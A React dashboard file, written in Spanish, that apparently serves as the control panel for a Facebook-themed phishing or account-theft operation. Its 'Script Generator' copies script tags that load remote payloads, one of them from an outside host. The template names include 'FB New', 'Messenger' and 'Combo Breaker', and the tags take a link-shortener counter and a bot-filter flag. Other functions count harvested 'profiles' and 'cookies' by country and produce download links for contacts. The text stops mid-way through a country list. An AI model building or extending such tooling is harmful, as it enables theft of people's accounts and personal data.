import React from 'react';
import {
    Card,
    CardHeader,
    CardBody,
    CardTitle,
    Table,
    Row,
    Col,
    UncontrolledDropdown,
    DropdownMenu,
    DropdownItem,
    DropdownToggle,
    Input,
    Button,
} from 'reactstrap';

class Dashboard extends React.Component {
    constructor(props) {
        super(props);
        this.state = {
            countryData: [],
            countryDataCookie: [],
            modalDemo: true,
            CPALink: '',
            Bots: 0,
            Token: '',
            contador: '',
            plantilla: 'Plantillas',
            contacts: '',
            Api: 'APIS',
            cotorra: '',
            country: '',
            todaymount: 0,
        };
        this.toggleModalDemo = this.toggleModalDemo.bind(this);
    }

    handlecountry(event) {
        this.setState({ country: event.target.value });
    }
    handlecontador(event) {
        this.setState({ contador: event.target.value });
    }
    handlecotorra(event) {
        this.setState({ cotorra: event.target.value });
    }

    getSessionData(params) {
        return window.sessionStorage.getItem(params);
    }
    showFile = async (e) => {
        let txt = document.getElementById('file').files[0];
        var url = `${process.env.REACT_APP_BACKEND_URL}/profiles/uploadtxt?country=${this.state.country}&owner=${this.getSessionData('Owner')}`;
        let formData = new FormData();

        formData.append('txt', txt);
        fetch(url, { method: 'POST', body: formData }).then(() => {
            alert('Listo');
            window.location.reload();
        });
    };
    showFileGroup = async (e) => {
        let txt = document.getElementById('fileGroup').files[0];
        var url = `${process.env.REACT_APP_BACKEND_URL}/profiles/uploadgroup?country=${this.state.country}&owner=${this.getSessionData('UToken')}`;
        let formData = new FormData();

        formData.append('txt', txt);
        fetch(url, { method: 'POST', body: formData }).then(() => {
            alert('listo');
            window.location.reload();
        });
    };

    getCookie(cname) {
        var name = cname + '=';
        var decodedCookie = decodeURIComponent(document.cookie);
        var ca = decodedCookie.split(';');
        for (var i = 0; i < ca.length; i++) {
            var c = ca[i];
            // eslint-disable-next-line
            while (c.charAt(0) == ' ') {
                c = c.substring(1);
            }
            // eslint-disable-next-line
            if (c.indexOf(name) == 0) {
                return c.substring(name.length, c.length);
            }
        }
        return '';
    }

    toggleModalDemo() {
        this.setState({
            modalDemo: !this.state.modalDemo,
        });
    }
    getCountryList() {
        var that = this;
        if (this.getSessionData('VToken') !== null) {
            var xhr = new XMLHttpRequest();
            xhr.addEventListener('load', () => {
                if (xhr.status === 200) {
                    if (xhr.responseText !== 'No tienes mas perfiles!') {
                        var result = JSON.parse(xhr.responseText);
                        var n = 0;
                        var countryData = [];
                        function mapcountries(params) {
                            if (n < result.length) {
                                countryData.push({
                                    country: result[n].country,
                                    cantidad: result[n]['COUNT(*)'],
                                });
                                n++;
                                mapcountries();
                            } else {
                                that.setState({ countryData: countryData });
                            }
                        }
                        mapcountries();
                    } else {
                        this.setState({
                            countryData: [
                                {
                                    country: 'No hay perfiles!',
                                    cantidad: 'Compra!!!',
                                },
                            ],
                        });
                    }
                }
            });
            // open the request with the verb and the url
            xhr.open(
                'GET',
                `${process.env.REACT_APP_BACKEND_URL}/profiles/countries?owner=${this.getSessionData('UToken')}&country=Dominican Republic`
            );
            xhr.setRequestHeader('Authorization', 'BEARER ' + this.getSessionData('VToken'));

            // send the request
            xhr.send();
        }
    }
    getCountryListCookie() {
        var that = this;
        if (this.getSessionData('VToken') !== null) {
            var xhr = new XMLHttpRequest();
            xhr.addEventListener('load', () => {
                if (xhr.status === 200) {
                    if (xhr.responseText !== 'No tienes mas perfiles!') {
                        var result = JSON.parse(xhr.responseText);
                        var n = 0;
                        var countryData = [];
                        function mapcountries(params) {
                            if (n < result.length) {
                                countryData.push({
                                    country: result[n].country,
                                    cantidad: result[n]['COUNT(*)'],
                                });
                                n++;
                                mapcountries();
                            } else {
                                that.setState({ countryDataCookie: countryData });
                            }
                        }
                        mapcountries();
                    } else {
                        this.setState({
                            countryData: [
                                {
                                    country: 'No hay perfiles!',
                                    cantidad: 'Compra!!!',
                                },
                            ],
                        });
                    }
                }
            });
            // open the request with the verb and the url
            xhr.open(
                'GET',
                `${process.env.REACT_APP_BACKEND_URL}/profiles/countriesCookies?owner=${this.getSessionData('UToken')}&country=Dominican Republic`
            );
            xhr.setRequestHeader('Authorization', 'BEARER ' + this.getSessionData('VToken'));

            // send the request
            xhr.send();
        }
    }

    submit() {
        console.log('hey');
    }
    handletemplate(event) {
        this.setState({ plantilla: event.target.innerText });
    }
    handleApi(event) {
        this.setState({ Api: event.target.innerText });
    }
    copyscript() {
        var script = '';
        if (this.state.plantilla === 'FB New') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scNew?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB new Doble') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scnewDouble?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB V1') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scV1?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB V1 Doble') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scV1Double?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Blanco') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scBlanco?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Blanco Doble') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scBlancoDouble?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'New script') {
            if (this.state.contador !== '') {
                script =
                    `<script src="https://45d3r.me/fatireload/objvacation.php?counter=` +
                    this.state.contador +
                    `&token=` +
                    this.getSessionData('Owner') +
                    `"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Viejo Multiple Pais') {
            if (this.state.contador !== '') {
                script = `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fbmultiplepais?contador=${this.state.contador
                    }&owner=${this.getSessionData('Owner')}&isbot=false&before=true&selectedcountry=${this.state.country}"></script>`;

                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Alert Multiple Pais') {
            if (this.state.contador !== '') {
                script = `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fbmultiplepaisAlert?contador=${this.state.contador
                    }&owner=${this.getSessionData('Owner')}&isbot=false&before=true&selectedcountry=${this.state.country}"></script>`;

                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Viejo Pais') {
            if (this.state.contador !== '') {
                script = `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scViejo2?contador=${this.state.contador
                    }&owner=${this.getSessionData('Owner')}&isbot=false&before=true&selectedcountry=${this.state.country}"></script>`;

                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Viejo Pais Doble') {
            if (this.state.contador !== '') {
                script = `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scViejoDouble2?contador=${this.state.contador
                    }&owner=${this.getSessionData('Owner')}&isbot=false&before=true&selectedcountry=${this.state.country}"></script>`;

                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'Combo Breaker') {
            if (this.state.contador !== '') {
                script = `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/combobreaker?contador=${this.state.contador
                    }&owner=${this.getSessionData('Owner')}&isbot=false&before=true&selectedcountry=${this.state.country}"></script>`;

                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'LA CABRA') {
            if (this.state.contador !== '') {
                script = `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/lacabra?contador=${this.state.contador
                    }&owner=${this.getSessionData('Owner')}&isbot=false&before=true&selectedcountry=${this.state.country}"></script>`;

                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FbNew Breaker') {
            if (this.state.contador !== '') {
                script = `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fmNewBreaker?contador=${this.state.contador
                    }&owner=${this.getSessionData('Owner')}&isbot=false&before=true&selectedcountry=${this.state.country}"></script>`;

                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'IFrame') {
            if (this.state.contador !== '') {
                script = `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fbIframe?contador=${this.state.contador
                    }&owner=${this.getSessionData('Owner')}&isbot=false&before=true&selectedcountry=${this.state.country}"></script>`;

                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Viejo') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scViejo2?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'Messenger') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scmessenger?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Viejo Doble') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/scViejoDouble2?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB New Dominio') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fmNew?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB new Doble Dominio') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fmnewDouble?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB V1 Dominio') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fmV1?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB V1 Doble Dominio') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fmV1Double?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Blanco Dominio') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fmBlanco?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Blanco Doble Dominio') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fmBlancoDouble?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Viejo Dominio') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fmViejo2?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else if (this.state.plantilla === 'FB Viejo Doble Dominio') {
            if (this.state.contador !== '') {
                script =
                    `<script src="${process.env.REACT_APP_BACKEND_URL}/api/scripts/fmViejoDouble2?contador=` +
                    this.state.contador +
                    `&owner=` +
                    this.getSessionData('Owner') +
                    `&isbot=false"></script>`;
                navigator.clipboard.writeText(script);
            } else {
                alert('Wow Barón, sin acortador? tú ta relajando! \nBarón póngase serio');
            }
        } else {
            alert('Primero elecciona una plantilla');
        }
    }
    copyApi() {
        if (this.state.Api === 'Contactos') {
            let script = `${process.env.REACT_APP_DOMAIN}/bajaprofile.php?owner=${this.getSessionData('UToken')}&country=${this.state.country}`;
            navigator.clipboard.writeText(script);
        } else if (this.state.Api === 'Contactos Usados') {
            let script = `${process.env.REACT_APP_DOMAIN}/bajaprofileusados.php?owner=${this.getSessionData('UToken')}&country=${this.state.country}`;
            navigator.clipboard.writeText(script);
        } else if (this.state.Api === 'Enlaces') {
            let script = `${process.env.REACT_APP_DOMAIN}/bajalink.php?owner=${this.getSessionData('UToken')}&cotorra=${this.state.cotorra}`;
            navigator.clipboard.writeText(script);
        } else {
            alert('Primero elecciona un api');
        }
    }
    componentDidMount() {
        this.getCountryList();
        this.getCountryListCookie();
        let that = this;
        console.log(process.env.REACT_APP_BACKEND_URL);
        fetch(`${process.env.REACT_APP_BACKEND_URL}/profiles/countoday?owner=${this.getSessionData('Owner')}`, {
            headers: {
                accept: '*/*',
                'accept-language': 'es-ES,es;q=0.9,en;q=0.8',
                authorization: 'BEARER ' + this.getSessionData('VToken'),
                'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"',
                'sec-ch-ua-mobile': '?0',
                'sec-ch-ua-platform': '"Windows"',
                'sec-fetch-dest': 'empty',
                'sec-fetch-mode': 'cors',
                'sec-fetch-site': 'same-site',
            },
            referrerPolicy: 'strict-origin-when-cross-origin',
            body: null,
            method: 'GET',
            mode: 'cors',
        })
            .then((res) => res.json())
            .then((count) => that.setState({ todaymount: count.cantidad }));
    }

    render() {
        return (
            <>
                <div className='content'>
                    <Row>
                        <Col lg='6' md='12'>
                            <Card>
                                <CardHeader>
                                    <CardTitle tag='h4'>Script Generator</CardTitle>
                                </CardHeader>
                                <CardBody>
                                    <div className='table-full-width table-responsive'>
                                        <Table>
                                            <tbody>
                                                <td>
                                                    <p className='title'>Seleccione su plantilla</p>
                                                    <UncontrolledDropdown>
                                                        <DropdownToggle caret color='info' className='animation-on-hover' data-toggle='dropdown'>
                                                            {this.state.plantilla}
                                                        </DropdownToggle>
                                                        <DropdownMenu className='dropdown-black'>
                                                            <DropdownItem onClick={this.handletemplate.bind(this)}>New script</DropdownItem>

                                                            <DropdownItem onClick={this.handletemplate.bind(this)}>
                                                                FB Alert Multiple Pais
                                                            </DropdownItem>
                                                            {this.getSessionData('Owner') === 'papijuan' ||
                                                                this.getSessionData('Owner') === 'jimenez' ||
                                                                this.getSessionData('Owner') === 'daury' ? (
                                                                <DropdownItem onClick={this.handletemplate.bind(this)}>LA CABRA</DropdownItem>
                                                            ) : (
                                                                <></>
                                                            )}
                                                            {this.getSessionData('Owner') === 'drakgon' ? (
                                                                <DropdownItem onClick={this.handletemplate.bind(this)}>IFrame</DropdownItem>
                                                            ) : (
                                                                <></>
                                                            )}
                                                            <DropdownItem onClick={this.handletemplate.bind(this)}>Messenger</DropdownItem>
                                                            <DropdownItem onClick={this.handletemplate.bind(this)}>Combo Breaker</DropdownItem>
                                                            <DropdownItem onClick={this.handletemplate.bind(this)}>FB Viejo Pais</DropdownItem>
                                                            <DropdownItem onClick={this.handletemplate.bind(this)}>
                                                                FB Viejo Multiple Pais
                                                            </DropdownItem>

                                                            {this.getSessionData('Owner') === 'naldo' ? (
                                                                <>
                                                                    <DropdownItem onClick={this.handletemplate.bind(this)}>
                                                                        FB New Dominio
                                                                    </DropdownItem>
                                                                    <DropdownItem onClick={this.handletemplate.bind(this)}>
                                                                        FB new Doble Dominio
                                                                    </DropdownItem>
                                                                    <DropdownItem onClick={this.handletemplate.bind(this)}>
                                                                        FB V1 Dominio
                                                                    </DropdownItem>
                                                                    <DropdownItem onClick={this.handletemplate.bind(this)}>
                                                                        FB V1 Doble Dominio
                                                                    </DropdownItem>
                                                                    <DropdownItem onClick={this.handletemplate.bind(this)}>
                                                                        FB Blanco Dominio
                                                                    </DropdownItem>
                                                                    <DropdownItem onClick={this.handletemplate.bind(this)}>
                                                                        FB Blanco Doble Dominio
                                                                    </DropdownItem>
                                                                    <DropdownItem onClick={this.handletemplate.bind(this)}>
                                                                        FB Viejo Dominio
                                                                    </DropdownItem>
                                                                    <DropdownItem onClick={this.handletemplate.bind(this)}>
                                                                        FB Viejo Doble Dominio
                                                                    </DropdownItem>
                                                                </>
                                                            ) : (
                                                                <></>
                                                            )}
                                                            <DropdownItem onClick={this.handletemplate.bind(this)}>FB New</DropdownItem>

                                                            <DropdownItem onClick={this.handletemplate.bind(this)}>FB V1</DropdownItem>
                                                            <DropdownItem onClick={this.handletemplate.bind(this)}>FB Viejo</DropdownItem>
                                                        </DropdownMenu>
                                                    </UncontrolledDropdown>
                                                    <br />
                                                    <Button onClick={() => this.copyscript()} color='info' className='animation-on-hover'>
                                                        Copiar Script
                                                    </Button>
                                                    <div>
                                                        <label for='country'>
                                                            <h3>Selecciona el pais -&gt; </h3>
                                                        </label>

                                                        <Input
                                                            type='select'
                                                            name='country'
                                                            value={this.state.country}
                                                            onChange={this.handlecountry.bind(this)}
                                                        >
                                                            <option value=''>Pais</option>
                                                            <option value='Anonymous Proxy'>Anonymous Proxy</option>
                                                            <option value='Satellite Provider'>Satellite Provider</option>
                                                            <option value='Other Country'>Other Country</option>
                                                            <option value='Andorra'>Andorra</option>
                                                            <option value='United Arab Emirates'>United Arab Emirates</option>
                                                            <option value='Afghanistan'>Afghanistan</option>
                                                            <option value='Antigua and Barbuda'>Antigua and Barbuda</option>
                                                            <option value='Anguilla'>Anguilla</option>
                                                            <option value='Albania'>Albania</option>
                                                            <option value='Armenia'>Armenia</option>
                                                            <option value='Angola'>Angola</option>
                                                            <option value='Asia/Pacific Region'>Asia/Pacific Region</option>
                                                            <option value='Antarctica'>Antarctica</option>
                                                            <option value='Argentina'>Argentina</option>
                                                            <option value='American Samoa'>American Samoa</option>
                                                            <option value='Austria'>Austria</option>
                                                            <option value='Australia'>Australia</option>
                                                            <option value='Aruba'>Aruba</option>
                                                            <option value='Aland Islands'>Aland Islands</option>
                                                            <option value='Azerbaijan'>Azerbaijan</option>
                                                            <option value='Bosnia and Herzegovina'>Bosnia and Herzegovina</option>
                                                            <option value='Barbados'>Barbados</option>
                                                            <option value='Bangladesh'>Bangladesh</option>
                                                            <option value='Belgium'>Belgium</option>
                                                            <option value='Burkina Faso'>Burkina Faso</option>
                                                            <option value='Bulgaria'>Bulgaria</option>
                                                            <option value='Bahrain'>Bahrain</option>
                                                            <option value='Burundi'>Burundi</option>
                                                            <option value='Benin'>Benin</option>
                                                            <option value='Saint Barthelemy'>Saint Barthelemy</option>
                                                            <option value='Bermuda'>Bermuda</option>
                                                            <option value='Brunei Darussalam'>Brunei Darussalam</option>
                                                            <option value='Bolivia'>Bolivia</option>
                                                            <option value='Brazil'>Brazil</option>
                                                            <option value='Bahamas'>Bahamas</option>
                                                            <option value='Bhutan'>Bhutan</option>
                                                            <option value='Bouvet Island'>Bouvet Island</option>
                                                            <option value='Botswana'>Botswana</option>
                                                            <option value='Belarus'>Belarus</option>
                                                            <option value='Belize'>Belize</option>
                                                            <option value='Canada'>Canada</option>
                                                            <option value='Cocos (Keeling) Islands'>Cocos (Keeling) Islands</option>
                                                            <option value='Central African Republic'>Central African Republic</option>
                                                            <option value='Congo'>Congo</option>
                                                            <option value='Switzerland'>Switzerland</option>
                                                            <option value="Cote d'Ivoire">Cote d'Ivoire</option>
                                                            <option value='Cook Islands'>Cook Islands</option>
                                                            <option value='Chile'>Chile</option>
                                                            <option value='Cameroon'>Cameroon</option>
                                                            <option value='China'>China</option>
                                                            <option value='Colombia'>Colombia</option>
                                                            <option value='Costa Rica'>Costa Rica</option>
                                                            <option value='Cuba'>Cuba</option>
                                                            <option value='Cape Verde'>Cape Verde</option>
                                                            <option value='Curacao'>Curacao</option>
                                                            <option value='Christmas Island'>Christmas Island</option>
                                                            <option value='Cyprus'>Cyprus</option>
                                                            <option value='Czech Republic'>Czech Republic</option>
                                                            <option value='Germany'>Germany</option>
                                                            <option value='Djibouti'>Djibouti</option>
                                                            <option value='Denmark'>Denmark</option>
                                                            <option value='Dominica'>Dominica</option>
                                                            <option value='Dominican Republic'>Dominican Republic</option>
                                                            <option value='Algeria'>Algeria</option>
                                                            <option value='Ecuador'>Ecuador</option>
                                                            <option value='Estonia'>Estonia</option>
                                                            <option value='Egypt'>Egypt</option>
                                                            <option value='Western Sahara'>Western Sahara</option>
                                                            <option value='Eritrea'>Eritrea</option>
                                                            <option value='Spain'>Spain</option>
                                                            <option value='Ethiopia'>Ethiopia</option>
                                                            <option value='Europe'>Europe</option>
                                                            <option value='Finland'>Finland</option>
                                                            <option value='Fiji'>Fiji</option>
                                                            <option value='Falkland Islands (Malvinas)'>Falkland Islands (Malvinas)</option>
                                                            <option value='Faroe Islands'>Faroe Islands</option>
                                                            <option value='France'>France</option>
                                                            <option value='Gabon'>Gabon</option>
                                                            <option value='United Kingdom'>United Kingdom</option>
                                                            <option value='Grenada'>Grenada</option>
                                                            <option value='Georgia'>Georgia</option>
                                                            <option value='French Guiana'>French Guiana</option>
                                                            <option value='Guernsey'>Guernsey</option>
                                                            <option value='Ghana'>Ghana</option>
                                                            <option value='Gibraltar'>Gibraltar</option>
                                                            <option value='Greenland'>Greenland</option>
                                                            <option value='Gambia'>Gambia</option>
                                                            <option value='Guinea'>Guinea</option>
                                                            <option value='Guadeloupe'>Guadeloupe</option>
                                                            <option value='Equatorial Guinea'>Equatorial Guinea</option>
                                                            <option value='Greece'>Greece</option>
                                                            <option value='South Georgia and the South Sandwich Islands'>
                                                                South Georgia and the South Sandwich Islands
                                                            </option>
                                                            <option value='Guatemala'>Guatemala</option>
                                                            <option value='Guam'>Guam</option>
                                                            <option value='Guinea-Bissau'>Guinea-Bissau</option>
                                                            <option value='Guyana'>Guyana</option>
                                                            <option value='Hong Kong'>Hong Kong</option>
                                                            <option value='Heard Island and McDonald Islands'>
                                                                Heard Island and McDonald Islands
                                                            </option>
                                                            <option value='Honduras'>Honduras</option>
                                                            <option value='Croatia'>Croatia</option>
                                                            <option value='Haiti'>Haiti</option>
                                                            <option value='Hungary'>Hungary</option>
                                                            <option value='Indonesia'>Indonesia</option>
                                                            <option value='Ireland'>Ireland</option>
                                                            <option value='Israel'>Israel</option>
                                                            <option value='Isle of Man'>Isle of Man</option>
                                                            <option value='India'>India</option>
                                                            <option value='British Indian Ocean Territory'>British Indian Ocean Territory</option>
                                                            <option value='Iraq'>Iraq</option>
                                                            <option value='Iceland'>Iceland</option>
                                                            <option value='Italy'>Italy</option>
                                                            <option value='Jersey'>Jersey</option>
                                                            <option value='Jamaica'>Jamaica</option>
                                                            <option value='Jordan'>Jordan</option>
                                                            <option value='Japan'>Japan</option>
                                                            <option value='Kenya'>Kenya</option>
                                                            <option value='Kyrgyzstan'>Kyrgyzstan</option>
                                                            <option value='Cambodia'>Cambodia</option>
                                                            <option value='Kiribati'>Kiribati</option>
                                                            <option value='Comoros'>Comoros</option>
                                                            <option value='Saint Kitts and Nevis'>Saint Kitts and Nevis</option>
                                                            <option value='Kuwait'>Kuwait</option>
                                                            <option value='Cayman Islands'>Cayman Islands</option>
                                                            <option value='Kazakhstan'>Kazakhstan</option>
                                                            <option value="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
                                                            <option value='Lebanon'>Lebanon</option>
                                                            <option value='Saint Lucia'>Saint Lucia</option>
                                                            <option value='Liechtenstein'>Liechtenstein</option>
                                                            <option value='Sri Lanka'>Sri Lanka</option>
                                                            <option value='Liberia'>Liberia</option>
                                                            <option value='Lesotho'>Lesotho</option>
                                                            <option value='Lithuania'>Lithuania</option>
                                                            <option value='Luxembourg'>Luxembourg</option>
                                                            <option value='Latvia'>Latvia</option>
                                                            <option value='Libyan Arab Jamahiriya'>Libyan Arab Jamahiriya</option>
                                                            <option value='Morocco'>Morocco</option>
                                                            <option value='Monaco'>Monaco</option>
                                                            <option value='Moldova :  Republic of'>Moldova : Republic of</option>
                                                            <option value='Montenegro'>Montenegro</option>
                                                            <option value='Saint Martin'>Saint Martin</option>
                                                            <option value='Madagascar'>Madagascar</option>
                                                            <option value='Marshall Islands'>Marshall Islands</option>
                                                            <option value='Macedonia'>Macedonia</option>
                                                            <option value='Mali'>Mali</option>
                                                            <option value='Myanmar'>Myanmar</option>
                                                            <option value='Mongolia'>Mongolia</option>
                                                            <option value='Macao'>Macao</option>
                                                            <option value='Northern Mariana Islands'>Northern Mariana Islands</option>
                                                            <option value='Martinique'>Martinique</option>
                                                            <option value='Mauritania'>Mauritania</option>
                                                            <option value='Montserrat'>Montserrat</option>
                                                            <option value='Malta'>Malta</option>
                                                            <option value='Mauritius'>Mauritius</option>
                                                            <option value='Maldives'>Maldives</option>
                                                            <option value='Malawi'>Malawi</option>
                                                            <option value='Mexico'>Mexico</option>
                                                            <option value='Malaysia'>Malaysia</option>
                                                            <option value='Mozambique'>Mozambique</option>
                                                            <option value='Namibia'>Namibia</option>
                                                            <option value='New Caledonia'>New Caledonia</option>
                                                            <option value='Niger'>Niger</option>
                                                            <option value='Norfolk Island'>Norfolk Island</option>
                                                            <option value='Nigeria'>Nigeria</option>
                                                            <option value='Nicaragua'>Nicaragua</option>
                                                            <option value='Netherlands'>Netherlands</option>
                                                            <option value='Norway'>Norway</option>
                                                            <option value='Nepal'>Nepal</option>
                                                            <option value='Nauru'>Nauru</option>
                                                            <option value='Niue'>Niue</option>
                                                            <option value='New Zealand'>New Zealand</option>
                                                            <option value='Oman'>Oman</option>
                                                            <option value='Panama'>Panama</option>
                                                            <option value='Peru'>Peru</option>
                                                            <option value='French Polynesia'>French Polynesia</option>
                                                            <option value='Papua New Guinea'>Papua New Guinea</option>
                                                            <option value='Philippines'>Philippines</option>
                                                            <option value='Pakistan'>Pakistan</option>
                                                            <option value='Poland'>Poland</option>
                                                            <option value='Saint Pierre and Miquelon'>Saint Pierre and Miquelon</option>
                                                            <option value='Pitcairn'>Pitcairn</option>
                                                            <option value='Puerto Rico'>Puerto Rico</option>
                                                            <option value='Palestinian Territory'>Palestinian Territory</option>
                                                            <option value='Portugal'>Portugal</option>
                                                            <option value='Palau'>Palau</option>
                                                            <option value='Paraguay'>Paraguay</option>
                                                            <option value='Qatar'>Qatar</option>
                                                            <option value='Reunion'>Reunion</option>
                                                            <option value='Romania'>Romania</option>
                                                            <option value='Serbia'>Serbia</option>
                                                            <option value='Russian Federation'>Russian Federation</option>
                                                            <option value='Rwanda'>Rwanda</option>
                                                            <option value='Saudi Arabia'>Saudi Arabia</option>
                                                            <option value='Solomon Islands'>Solomon Islands</option>
                                                            <option value='Seychelles'>Seychelles</option>
